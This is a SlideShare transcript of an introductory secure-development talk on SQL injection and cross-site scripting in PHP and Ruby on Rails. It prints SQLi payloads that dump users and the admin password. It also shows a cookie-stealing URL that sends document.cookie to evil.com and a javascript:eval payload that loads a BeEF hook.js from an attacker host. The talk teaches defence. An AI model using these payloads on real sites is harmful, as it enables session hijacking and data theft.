SlideShare a Scribd company logo

Don't Do what Derpy the Dreadful Dev Does

L
Liam O'Saurus

1) The document discusses common web application vulnerabilities like SQL injection and cross-site scripting. It demonstrates how these vulnerabilities can be exploited in PHP and Ruby on Rails applications. 2) While Ruby on Rails has security features built-in, the speaker argues these do not eliminate security risks and that all developers must take responsibility for security. 3) Popular tools like BeEF, SQLmap, and Burp Suite are demonstrated for exploiting vulnerabilities like cross-site scripting and stealing cookie sessions. The key message is that no framework can replace secure coding practices.

Technology
1 of 31
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Don’t Do what Derpy The Dreadful Dev Does (also - don’t let “friends” on IRC decide on your talk title) Secure Development Melbourne, 11/06/2015
whoami • @liamosaur • Penetration Tester / Consultant with Assurance • Previously: C# / Java developer
The Brief • Basic, Introductory Level talk about security • Establish some common ground between the Infosec and Dev world
Topics • Popular vulnerabilities (hopefully a recap) • Demo some tools by exploiting some vulns
OWASP Top 5/10 1. Injection (SQLi, Command injection, XXE, LDAPi etc) 2. Broken Auth / Session Management 3. Cross-Site Scripting (XSS) 4. Insecure Direct Object References 5. Security Misconfiguration
SQLi basics • Inject user controlled content into dynamic SQL queries, allowing unintended access/ control of database
SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: liamo • SQL: SELECT username FROM users WHERE username=‘liamo’ • Query result: liamo
SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: ' OR 'a'='a • SQL: SELECT username FROM users WHERE username=‘' OR ‘a'='a’ • Query result: list of all users
SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: liamo' UNION SELECT password FROM users WHERE username='admin • SQL: SELECT username FROM users WHERE username=‘liamo' UNION SELECT password FROM users WHERE username='admin’ • Query result: liamo and the admin password
Cross-Site Scripting (XSS) • Inject user controlled content into dynamic web content, allowing unintended access/ control within a target browser
XSS Basics • HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></ html> • Input: Liam • Output: Hello, Liam!
XSS Basics • HTML: <html><body>Hello, <? php echo $_REQUEST ['name']; ?>!</body></ html> • Input: Liam<script>alert(1)</ script> • Output:
XSS - Who cares? • Old school - cookie stealing • http://evil.com/cookies.php? +escape(document.cookie) • Steal session ID - game over • Less effective thanks to httpOnly cookie flag
“Nobody uses PHP anymore Liam, all the cool kids use Ruby on Rails now” PHP Demo!
Rails • Problem #1 - I don’t know Rails • Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)
Rails • Learned Rails. Wrote a basic app • Problem #2: Rails has ActiveRecord magic beans that prevent SQLi
Rails • Solution: Uhh.. maybe I’ll just demo XSS instead!
Rails • Problem #3: Rails has input/ output escaping magic beans that prevent XSS
• Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire
Rubby Demo!
Presenting: Rubby
Presenting: Rubby • Bad code • Better code
Exploiting Rubby
Rubby XSS • “link_to” is vulnerable to XSS out of the box if it displays user controlled content
Rubby XSS • Challenge for those playing at home: some up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x() {var a = document.createElement('scrip t');a.setAttribute('src','htt p://192.168.57.159:3000/ hook.js');document.head.appen dChild(a);};x();");
BeEF Tunnelling Proxy BeEF SERVER 
 (http proxy) Phish with XSS hook.js Attackers Browser Victims Browser
 (XHR proxy) Target server (same domain as XSS phish)
Frameworks/Languages • PHP • Bad: No built in security • Ruby on Rails • Good: Built in security
Frameworks/Languages • PHP • Good: PHP devs know they need to take security into account • Ruby on Rails • Bad: “The framework takes care of security for me!”
Conclusions • Security is everyone’s responsibility • Your frameworks magic beans won’t save you
Questions - save for the Q&A Panel!
References • https://www.owasp.org/index.php/ Top_10_2013-Top_10 • http://rails-sqli.org/ • https://www.owasp.org/index.php/ Ruby_on_Rails_Cheatsheet • https://github.com/beefproject/beef/wiki/ Tunneling • http://sqlmap.org/

More Related Content

PPTX
Thoughts on Defensive Development for Sitecore
PINT Inc
 
PDF
WordPress Security Essentials
Angela Bowman
 
PPTX
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
JeremyRyanKelso
 
PDF
Testers, get into security bug bounties!
eusebiu daniel blindu
 
PDF
Be Securious – Hack Your Own Site for Better Security
securiously
 
PPTX
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Brian Layman
 
PPT
Blog World 2010 - How to Keep Your Blog from Being Hacked
Brian Layman
 
PPTX
Let’s write a plugin
Brian Layman
 
Thoughts on Defensive Development for Sitecore
PINT Inc
 
WordPress Security Essentials
Angela Bowman
 
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
JeremyRyanKelso
 
Testers, get into security bug bounties!
eusebiu daniel blindu
 
Be Securious – Hack Your Own Site for Better Security
securiously
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Brian Layman
 
Blog World 2010 - How to Keep Your Blog from Being Hacked
Brian Layman
 
Let’s write a plugin
Brian Layman
 

What's hot (19)

PDF
Keep Your SIte Secure
Michele Butcher-Jones
 
PDF
The Hacker's Guide to XSS
Patrycja Wegrzynowicz
 
PDF
WordPress Setup and Security - WordCamp, Charleston 2014
Michael Carnell
 
PPTX
Html5 security
Krishna T
 
PDF
Html5 for Security Folks
n|u - The Open Security Community
 
PDF
orcreatehappyusers
tutorialsruby
 
PDF
8 Simple Ways to Hack Your Joomla
SiteGround.com
 
PDF
Analysis of web application worms and viruses
UltraUploader
 
KEY
Screw HTML5, make cool shit with AIR
Eric Fickes
 
PDF
Intro to Yo
Shawn Rider
 
PDF
Progressive Enhancement
Zach Leatherman
 
PPTX
Selenium Online Training
Learntek1
 
PDF
Lecture1
Anton Yatsenko
 
PPTX
Securing your web apps now
Stephan Steynfaardt
 
PDF
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
PPTX
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 
PDF
The ES6 Conundrum - All Things Open 2015
Christian Heilmann
 
PPTX
Java scriptwidgetdevelopmentjstanbul2012
Volkan Özçelik
 
PDF
Demystifying WordPress
Mykl Roventine
 
Keep Your SIte Secure
Michele Butcher-Jones
 
The Hacker's Guide to XSS
Patrycja Wegrzynowicz
 
WordPress Setup and Security - WordCamp, Charleston 2014
Michael Carnell
 
Html5 security
Krishna T
 
Html5 for Security Folks
n|u - The Open Security Community
 
orcreatehappyusers
tutorialsruby
 
8 Simple Ways to Hack Your Joomla
SiteGround.com
 
Analysis of web application worms and viruses
UltraUploader
 
Screw HTML5, make cool shit with AIR
Eric Fickes
 
Intro to Yo
Shawn Rider
 
Progressive Enhancement
Zach Leatherman
 
Selenium Online Training
Learntek1
 
Lecture1
Anton Yatsenko
 
Securing your web apps now
Stephan Steynfaardt
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 
The ES6 Conundrum - All Things Open 2015
Christian Heilmann
 
Java scriptwidgetdevelopmentjstanbul2012
Volkan Özçelik
 
Demystifying WordPress
Mykl Roventine
 
Ad

Similar to Don't Do what Derpy the Dreadful Dev Does (20)

PPT
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
Brian Huff
 
PDF
Finding Needles in Haystacks
snyff
 
PPT
Top Ten Proactive Web Security Controls v5
Jim Manico
 
PDF
libinjection: from SQLi to XSS  by Nick Galbreath
CODE BLUE
 
PDF
Hacking sites for fun and profit
David Stockton
 
PPTX
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
SecuRing
 
PPTX
Ten Commandments of Secure Coding
Mateusz Olejarka
 
PDF
Security in practice with Java EE 6 and GlassFish
Markus Eisele
 
PPTX
(java2days) The Anatomy of Java Vulnerabilities
Steve Poole
 
PDF
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Michael Pirnat
 
PDF
Hacking sites for fun and profit
David Stockton
 
PDF
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
PPTX
On non existent 0-days, stable binary exploits and
Alisa Esage Шевченко
 
PPTX
Java application security the hard way - a workshop for the serious developer
Steve Poole
 
PPTX
Confidence web
Dan Kaminsky
 
PDF
Entomology 101
snyff
 
PDF
Esage on non-existent 0-days, stable binary exploits and user interaction
DefconRussia
 
PDF
Defensive programing 101
Niall Merrigan
 
PPTX
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
Darren Duke
 
PDF
Joomla! security jday2015
kriptonium
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
Brian Huff
 
Finding Needles in Haystacks
snyff
 
Top Ten Proactive Web Security Controls v5
Jim Manico
 
libinjection: from SQLi to XSS  by Nick Galbreath
CODE BLUE
 
Hacking sites for fun and profit
David Stockton
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
SecuRing
 
Ten Commandments of Secure Coding
Mateusz Olejarka
 
Security in practice with Java EE 6 and GlassFish
Markus Eisele
 
(java2days) The Anatomy of Java Vulnerabilities
Steve Poole
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Michael Pirnat
 
Hacking sites for fun and profit
David Stockton
 
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
On non existent 0-days, stable binary exploits and
Alisa Esage Шевченко
 
Java application security the hard way - a workshop for the serious developer
Steve Poole
 
Confidence web
Dan Kaminsky
 
Entomology 101
snyff
 
Esage on non-existent 0-days, stable binary exploits and user interaction
DefconRussia
 
Defensive programing 101
Niall Merrigan
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
Darren Duke
 
Joomla! security jday2015
kriptonium
 
Ad

Recently uploaded (20)

PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
KodekX | Application Modernization Development
KodekX
 
Encapsulation theory and applications.pdf
gurumoop
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
Teaching material agriculture food technology
LiaRayya
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 

Don't Do what Derpy the Dreadful Dev Does

  • 1. Don’t Do what Derpy The Dreadful Dev Does (also - don’t let “friends” on IRC decide on your talk title) Secure Development Melbourne, 11/06/2015
  • 2. whoami • @liamosaur • Penetration Tester / Consultant with Assurance • Previously: C# / Java developer
  • 3. The Brief • Basic, Introductory Level talk about security • Establish some common ground between the Infosec and Dev world
  • 4. Topics • Popular vulnerabilities (hopefully a recap) • Demo some tools by exploiting some vulns
  • 5. OWASP Top 5/10 1. Injection (SQLi, Command injection, XXE, LDAPi etc) 2. Broken Auth / Session Management 3. Cross-Site Scripting (XSS) 4. Insecure Direct Object References 5. Security Misconfiguration
  • 6. SQLi basics • Inject user controlled content into dynamic SQL queries, allowing unintended access/ control of database
  • 7. SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: liamo • SQL: SELECT username FROM users WHERE username=‘liamo’ • Query result: liamo
  • 8. SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: ' OR 'a'='a • SQL: SELECT username FROM users WHERE username=‘' OR ‘a'='a’ • Query result: list of all users
  • 9. SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: liamo' UNION SELECT password FROM users WHERE username='admin • SQL: SELECT username FROM users WHERE username=‘liamo' UNION SELECT password FROM users WHERE username='admin’ • Query result: liamo and the admin password
  • 10. Cross-Site Scripting (XSS) • Inject user controlled content into dynamic web content, allowing unintended access/ control within a target browser
  • 11. XSS Basics • HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></ html> • Input: Liam • Output: Hello, Liam!
  • 12. XSS Basics • HTML: <html><body>Hello, <? php echo $_REQUEST ['name']; ?>!</body></ html> • Input: Liam<script>alert(1)</ script> • Output:
  • 13. XSS - Who cares? • Old school - cookie stealing • http://evil.com/cookies.php? +escape(document.cookie) • Steal session ID - game over • Less effective thanks to httpOnly cookie flag
  • 14. “Nobody uses PHP anymore Liam, all the cool kids use Ruby on Rails now” PHP Demo!
  • 15. Rails • Problem #1 - I don’t know Rails • Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)
  • 16. Rails • Learned Rails. Wrote a basic app • Problem #2: Rails has ActiveRecord magic beans that prevent SQLi
  • 17. Rails • Solution: Uhh.. maybe I’ll just demo XSS instead!
  • 18. Rails • Problem #3: Rails has input/ output escaping magic beans that prevent XSS
  • 19. • Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire
  • 22. Presenting: Rubby • Bad code • Better code
  • 24. Rubby XSS • “link_to” is vulnerable to XSS out of the box if it displays user controlled content
  • 25. Rubby XSS • Challenge for those playing at home: some up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x() {var a = document.createElement('scrip t');a.setAttribute('src','htt p://192.168.57.159:3000/ hook.js');document.head.appen dChild(a);};x();");
  • 26. BeEF Tunnelling Proxy BeEF SERVER 
 (http proxy) Phish with XSS hook.js Attackers Browser Victims Browser
 (XHR proxy) Target server (same domain as XSS phish)
  • 27. Frameworks/Languages • PHP • Bad: No built in security • Ruby on Rails • Good: Built in security
  • 28. Frameworks/Languages • PHP • Good: PHP devs know they need to take security into account • Ruby on Rails • Bad: “The framework takes care of security for me!”
  • 29. Conclusions • Security is everyone’s responsibility • Your frameworks magic beans won’t save you
  • 30. Questions - save for the Q&A Panel!
  • 31. References • https://www.owasp.org/index.php/ Top_10_2013-Top_10 • http://rails-sqli.org/ • https://www.owasp.org/index.php/ Ruby_on_Rails_Cheatsheet • https://github.com/beefproject/beef/wiki/ Tunneling • http://sqlmap.org/